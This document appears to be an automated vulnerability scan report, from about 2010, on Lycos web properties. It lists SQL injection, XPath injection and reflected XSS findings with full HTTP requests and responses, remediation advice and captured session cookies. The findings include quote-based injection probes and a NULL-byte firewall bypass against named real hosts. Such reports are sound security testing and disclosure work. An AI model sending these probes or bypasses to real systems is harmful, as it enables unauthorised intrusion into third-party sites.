3.351. http://info.lycos.com/safety.php [diktfc cookie]

3.352. http://info.lycos.com/safety.php [diktfc cookie]

3.353. http://info.lycos.com/tos-mail.php [diktfc cookie]

3.354. http://info.lycos.com/tos-mail.php [diktfc cookie]

3.355. http://info.lycos.com/tos-po.php [diktfc cookie]

3.356. http://info.lycos.com/tos-po.php [diktfc cookie]

3.357. http://info.lycos.com/tos-subs.php [diktfc cookie]

3.358. http://info.lycos.com/tos-subs.php [diktfc cookie]

3.359. http://info.lycos.com/tos-tm.php [diktfc cookie]

3.360. http://info.lycos.com/tos-tm.php [diktfc cookie]

3.361. http://info.lycos.com/tos.php [diktfc cookie]

3.362. http://info.lycos.com/tos.php [diktfc cookie]

3.363. http://peoplesearch.lycos.com/ [diktfc cookie]

3.364. http://peoplesearch.lycos.com/ [diktfc cookie]

3.365. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

3.366. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

3.367. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

3.368. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

3.369. http://peoplesearch.lycos.com/index.php [diktfc cookie]

3.370. http://peoplesearch.lycos.com/index.php [diktfc cookie]

3.371. http://search.lycos.com/ [diktfc cookie]

3.372. http://search.lycos.com/ [diktfc cookie]

3.373. http://search.lycos.com/bootstrap.js [diktfc cookie]

3.374. http://search.lycos.com/bootstrap.js [diktfc cookie]

3.375. http://search.lycos.com/default.asp [diktfc cookie]

3.376. http://search.lycos.com/default.asp [diktfc cookie]

3.377. http://search.lycos.com/image/ [diktfc cookie]

3.378. http://search.lycos.com/image/ [diktfc cookie]

3.379. http://search.lycos.com/video/ [diktfc cookie]

3.380. http://search.lycos.com/video/ [diktfc cookie]



1. SQL injection  next
There are 11 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://deals.lycos.com/deals/stores/6pm-1460 [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/6pm-1460

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/6pm-1460' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.2. http://deals.lycos.com/deals/stores/best-buy-560 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/best-buy-560' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.3. http://deals.lycos.com/deals/stores/buy-com-233 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/buy-com-233' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.4. http://deals.lycos.com/deals/stores/dell-home-638 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/dell-home-638' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.5. http://deals.lycos.com/deals/stores/ebay-50 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/ebay-50' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.6. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/itunes-music-store-1414' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.7. http://deals.lycos.com/deals/stores/jcpenney-320 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/jcpenney-320

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/jcpenney-320' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.8. http://deals.lycos.com/deals/stores/kohls-1009 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/kohls-1009

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/kohls-1009' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.9. http://deals.lycos.com/deals/stores/sony-style-716 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/sony-style-716

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/sony-style-716' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.10. http://deals.lycos.com/deals/stores/walmart-321 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /deals/stores/walmart-321' HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:22 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals/stores/teleflora-1489">
...[SNIP]...

1.11. http://www.gamesville.com/cash/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.gamesville.com
Path:   /cash/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /cash/?1%00'=1 HTTP/1.1
Host: www.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div class="greet">
Failure is not falling down; it is not getting up again.
</div>
...[SNIP]...

Request 2

GET /cash/?1%00''=1 HTTP/1.1
Host: www.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;

Response 2

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:26:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

2. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://search.lycos.com
Path:   /default.asp

Issue detail

The PENTA cookie appears to be vulnerable to XPath injection attacks. The payload " was submitted in the PENTA cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /default.asp?query=travel&loc=travel HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460"; __utmc=1; __utmb=1.4.10.1292163890;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:36:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:36:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a rel="nofollow" href="http://154875.r.msn.com/?ld=4vaSWBScKlAQ0JzlRqBOSqd9mPt_uvO1gdfOmHwv90hRyPKKcgcnM6FN7I-VDRwbnjr8DZ823IZOENRt_X7g6SCz0wOBPwoPo71vZO7GBXPaTHnE3eErmrTQu0_ozbxxVG-4BrJtFY1dnOJf3QXjmorN_Iwk4B2K2GvOJBwQ4bKdPW6LcLNOsQ9GU1lqIyLG3hspNM_cqfuwDpWsuTmlzwBOhfocQ5Vl1zIj3IRUp_3wj_fB9_Z7wcSVI1uw64qAiKC_SDmwNbMjtQPRetaVVbzWzxJLTD3kV8I1GO46TqUnc1VAlMlH5mb
...[SNIP]...

3. Cross-site scripting (reflected)  previous
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

